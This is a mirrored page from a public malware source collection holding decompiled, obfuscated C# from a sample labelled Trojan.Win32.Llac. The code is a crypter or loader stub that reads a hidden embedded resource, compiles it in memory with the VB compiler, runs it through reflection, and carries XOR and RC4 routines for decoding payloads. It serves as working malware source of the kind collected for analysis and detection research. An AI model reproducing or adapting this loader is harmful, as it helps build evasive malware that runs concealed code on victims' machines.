mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
211 lines
9.1 KiB
C#
211 lines
9.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ
|
|||
|
// Assembly: MediaCenter, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 9606FA2A-F02F-46D3-BFDE-BA7924614AB7
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aacw-3c63882d1ca9dd6051c6236c3fd9e399b052b3b7c53a5a45527222968696881e.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.CodeDom.Compiler;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
[StandardModule]
|
|||
|
internal sealed class IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ
|
|||
|
{
|
|||
|
private static bool UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty = false;
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) "BNesBCLidHJpvPXNsnomrcjqHhhwnphHjOMtiDtkxJrqeeGOaD");
|
|||
|
}
|
|||
|
string IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName = "vyqPeXIprMotHRmznZBXWxfwimNnys";
|
|||
|
IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.vVgaspNiHzvHYmIvGdYBDjEJRHmvvuzWdkPcbruxpOdWGoqLns(IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.CYwokwNcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOO().Replace("\"__PATH__\"", "\"" + Assembly.GetExecutingAssembly().Location + "\""), IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName);
|
|||
|
}
|
|||
|
|
|||
|
public static string CYwokwNcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOO()
|
|||
|
{
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
string manifestResourceName = executingAssembly.GetManifestResourceNames()[0];
|
|||
|
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
|
|||
|
return manifestResourceStream == null ? "" : new StreamReader(manifestResourceStream).ReadToEnd();
|
|||
|
}
|
|||
|
|
|||
|
private static CompilerResults ZxNGpXauXbpzViVIjGEgOfRVvVgaspNiHzvHYmIvGdYBDjEJRH(
|
|||
|
CompilerParameters mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX,
|
|||
|
string oDLMWtoSTzHZhXDxywCntBRsrIxBrRtZXFtOEuJTCCooQYlNhM)
|
|||
|
{
|
|||
|
CompilerResults compilerResults;
|
|||
|
try
|
|||
|
{
|
|||
|
VBCodeProvider vbCodeProvider = new VBCodeProvider();
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.GenerateExecutable = false;
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.dll");
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.Windows.Forms.dll");
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.Data.dll");
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
|
|||
|
compilerResults = vbCodeProvider.CompileAssemblyFromSource(mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX, oDLMWtoSTzHZhXDxywCntBRsrIxBrRtZXFtOEuJTCCooQYlNhM);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
Exception exception = ex;
|
|||
|
if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) exception.Message);
|
|||
|
}
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
return compilerResults;
|
|||
|
}
|
|||
|
|
|||
|
private static void vVgaspNiHzvHYmIvGdYBDjEJRHmvvuzWdkPcbruxpOdWGoqLns(
|
|||
|
string IYceWvYDniXriZmxgfTFgDPdLcOTsgeYqnKgFKHSVkGHQaVyOh,
|
|||
|
string IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName)
|
|||
|
{
|
|||
|
CompilerParameters mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX = new CompilerParameters();
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.GenerateInMemory = true;
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.IncludeDebugInformation = false;
|
|||
|
mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.TreatWarningsAsErrors = false;
|
|||
|
try
|
|||
|
{
|
|||
|
IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.DcrkUCEZCGUQyNmmNWiLeKhzZzLFXHdNXdZlDRZajHCfhOUnvl((object) IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.ZxNGpXauXbpzViVIjGEgOfRVvVgaspNiHzvHYmIvGdYBDjEJRH(mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX, IYceWvYDniXriZmxgfTFgDPdLcOTsgeYqnKgFKHSVkGHQaVyOh).CompiledAssembly.GetType(IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName));
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
Exception exception = ex;
|
|||
|
if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) exception.Message);
|
|||
|
}
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void DcrkUCEZCGUQyNmmNWiLeKhzZzLFXHdNXdZlDRZajHCfhOUnvl(
|
|||
|
object kpEOiwjWwTSubsfjJjuoHEawVNJVlBWKTqlPRxSXfUBJKINkry)
|
|||
|
{
|
|||
|
BindingFlags bindingFlags1 = BindingFlags.Static | BindingFlags.Public | BindingFlags.InvokeMethod;
|
|||
|
object Instance = kpEOiwjWwTSubsfjJjuoHEawVNJVlBWKTqlPRxSXfUBJKINkry;
|
|||
|
object[] objArray = new object[5]
|
|||
|
{
|
|||
|
(object) "LIezZRNYpFaOXupTVCVbjYENOMRouC",
|
|||
|
(object) bindingFlags1,
|
|||
|
(object) null,
|
|||
|
(object) null,
|
|||
|
(object) null
|
|||
|
};
|
|||
|
object[] Arguments = objArray;
|
|||
|
bool[] flagArray = new bool[5]
|
|||
|
{
|
|||
|
false,
|
|||
|
true,
|
|||
|
false,
|
|||
|
false,
|
|||
|
false
|
|||
|
};
|
|||
|
bool[] CopyBack = flagArray;
|
|||
|
NewLateBinding.LateCall(Instance, (Type) null, "InvokeMember", Arguments, (string[]) null, (Type[]) null, CopyBack, true);
|
|||
|
if (!flagArray[1])
|
|||
|
return;
|
|||
|
BindingFlags bindingFlags2 = (BindingFlags) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (BindingFlags));
|
|||
|
}
|
|||
|
|
|||
|
public class LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw
|
|||
|
{
|
|||
|
public static string bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(
|
|||
|
string DataIn,
|
|||
|
string CodeKey)
|
|||
|
{
|
|||
|
long num = (long) Strings.Len(DataIn);
|
|||
|
long Start = 1;
|
|||
|
string str;
|
|||
|
while (Start <= num)
|
|||
|
{
|
|||
|
string Expression = Conversion.Hex(Strings.Asc(Strings.Mid(DataIn, checked ((int) Start), 1)) ^ Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (Start % (long) Strings.Len(CodeKey)) + 1L)), 1)));
|
|||
|
if (Strings.Len(Expression) == 1)
|
|||
|
Expression = "0" + Expression;
|
|||
|
str += Expression;
|
|||
|
checked { ++Start; }
|
|||
|
}
|
|||
|
return str;
|
|||
|
}
|
|||
|
|
|||
|
public static string NcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOOoxKmGl(
|
|||
|
string DataIn,
|
|||
|
string CodeKey)
|
|||
|
{
|
|||
|
long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
|
|||
|
long num2 = 1;
|
|||
|
string str;
|
|||
|
while (num2 <= num1)
|
|||
|
{
|
|||
|
int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
|
|||
|
int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
|
|||
|
str += Conversions.ToString(Strings.Chr(num3 ^ num4));
|
|||
|
checked { ++num2; }
|
|||
|
}
|
|||
|
return str;
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(
|
|||
|
byte[] Input,
|
|||
|
string Key)
|
|||
|
{
|
|||
|
return IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw.Proper_RC4(Input, Encoding.Default.GetBytes(Key));
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] NcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOOoxKmGl(
|
|||
|
byte[] Input,
|
|||
|
string Key)
|
|||
|
{
|
|||
|
return IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw.bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(Input, Key);
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] Proper_RC4(byte[] Input, byte[] Key)
|
|||
|
{
|
|||
|
uint[] numArray1 = new uint[256];
|
|||
|
byte[] numArray2 = new byte[checked (Input.Length - 1 + 1)];
|
|||
|
uint index1 = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
numArray1[checked ((int) index1)] = index1;
|
|||
|
checked { ++index1; }
|
|||
|
}
|
|||
|
while (index1 <= (uint) byte.MaxValue);
|
|||
|
uint index2 = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
uint index3 = checked ((uint) ((long) (index3 + (uint) Key[(int) unchecked ((long) index2 % (long) Key.Length)] + numArray1[(int) index2]) & (long) byte.MaxValue));
|
|||
|
uint num = numArray1[checked ((int) index2)];
|
|||
|
numArray1[checked ((int) index2)] = numArray1[checked ((int) index3)];
|
|||
|
numArray1[checked ((int) index3)] = num;
|
|||
|
checked { ++index2; }
|
|||
|
}
|
|||
|
while (index2 <= (uint) byte.MaxValue);
|
|||
|
uint index4 = 0;
|
|||
|
uint index5 = 0;
|
|||
|
int num1 = checked (numArray2.Length - 1);
|
|||
|
int index6 = 0;
|
|||
|
while (index6 <= num1)
|
|||
|
{
|
|||
|
index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
|
|||
|
index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
|
|||
|
uint num2 = numArray1[checked ((int) index4)];
|
|||
|
numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
|
|||
|
numArray1[checked ((int) index5)] = num2;
|
|||
|
numArray2[index6] = checked ((byte) ((int) Input[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
|
|||
|
checked { ++index6; }
|
|||
|
}
|
|||
|
return numArray2;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|